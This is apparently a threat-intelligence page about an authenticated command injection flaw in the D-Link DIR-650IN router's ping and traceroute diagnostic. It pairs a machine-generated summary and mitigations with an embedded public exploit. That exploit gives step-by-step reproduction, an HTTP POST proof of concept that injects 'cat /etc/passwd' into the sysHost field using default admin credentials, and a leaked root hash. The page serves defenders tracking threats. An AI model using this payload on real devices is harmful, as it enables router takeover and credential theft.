D-Link DIR-650IN - Authenticated Command Injection
D-Link DIR-650IN - Authenticated Command Injection
AI Analysis
Technical Summary
This vulnerability affects the D-Link DIR-650IN Wireless N300 Router running firmware version 1.04. The Diagnostic (Ping/Traceroute) functionality's sysHost parameter does not sanitize input, enabling authenticated attackers to perform command injection. By appending OS commands to legitimate ping or traceroute requests, attackers can execute arbitrary commands on the router's operating system. This leads to full system compromise, including reading sensitive files like /etc/passwd. The exploit requires authentication but can be performed with low-privilege accounts. Public exploit code is available, but no CVE identifier was initially assigned. There is no indication of an official patch or vendor advisory addressing this issue at this time.
Potential Impact
Successful exploitation allows an authenticated attacker to execute arbitrary operating system commands on the router, resulting in full compromise. This includes the ability to read sensitive system files such as /etc/passwd, potentially exposing user credentials and system information. The integrity and confidentiality of the router are severely impacted, which could facilitate further network attacks or persistent control over the device.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the router's web interface to trusted users only and enforce strong authentication credentials. Avoid exposing the router management interface to untrusted networks. Consider network segmentation to limit attacker reach if compromise occurs. Monitor for unauthorized access attempts.
Indicators of Compromise
- exploit-code: # Exploit Title: D-Link DIR-650IN - Authenticated Command Injection # Date: 2023-01-08 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.dlink.com # Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09 # Version: Firmware V1.04 (REQUIRED) # Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108 # CVE: N/A (Version included now, previously missing) Description: The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality. The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd. Steps to Reproduce: 1. Log in to the router web interface. 2. Go to Management → Diagnostic. 3. Select Ping or Traceroute. 4. Enter: google.com | cat /etc/passwd 5. Click Apply. 6. Output includes /etc/passwd contents. HTTP PoC: POST /boafrm/formSysCmd HTTP/1.1 Host: 192.168.0.1 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply Response Extract: root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/:/dev/null References: https://www.dlink.com https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
D-Link DIR-650IN - Authenticated Command Injection
Description
D-Link DIR-650IN - Authenticated Command Injection
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This vulnerability affects the D-Link DIR-650IN Wireless N300 Router running firmware version 1.04. The Diagnostic (Ping/Traceroute) functionality's sysHost parameter does not sanitize input, enabling authenticated attackers to perform command injection. By appending OS commands to legitimate ping or traceroute requests, attackers can execute arbitrary commands on the router's operating system. This leads to full system compromise, including reading sensitive files like /etc/passwd. The exploit requires authentication but can be performed with low-privilege accounts. Public exploit code is available, but no CVE identifier was initially assigned. There is no indication of an official patch or vendor advisory addressing this issue at this time.
Potential Impact
Successful exploitation allows an authenticated attacker to execute arbitrary operating system commands on the router, resulting in full compromise. This includes the ability to read sensitive system files such as /etc/passwd, potentially exposing user credentials and system information. The integrity and confidentiality of the router are severely impacted, which could facilitate further network attacks or persistent control over the device.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the router's web interface to trusted users only and enforce strong authentication credentials. Avoid exposing the router management interface to untrusted networks. Consider network segmentation to limit attacker reach if compromise occurs. Monitor for unauthorized access attempts.
Technical Details
- Edb Id
- 52508
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for D-Link DIR-650IN - Authenticated Command Injection
# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection # Date: 2023-01-08 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.dlink.com # Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09 # Version: Firmware V1.04 (REQUIRED) # Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108 # CVE: N/A (Version included now, previously missing) Description: The D-Link DIR-650IN Wireless N300 Router is vulnerable to an... (1037 more characters)
Threat ID: 69da14bc1cc7ad14da6c87c3
Added to database: 4/11/2026, 9:30:36 AM
Last enriched: 4/18/2026, 2:52:25 PM
Last updated: 5/26/2026, 6:47:43 PM
Views: 133
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.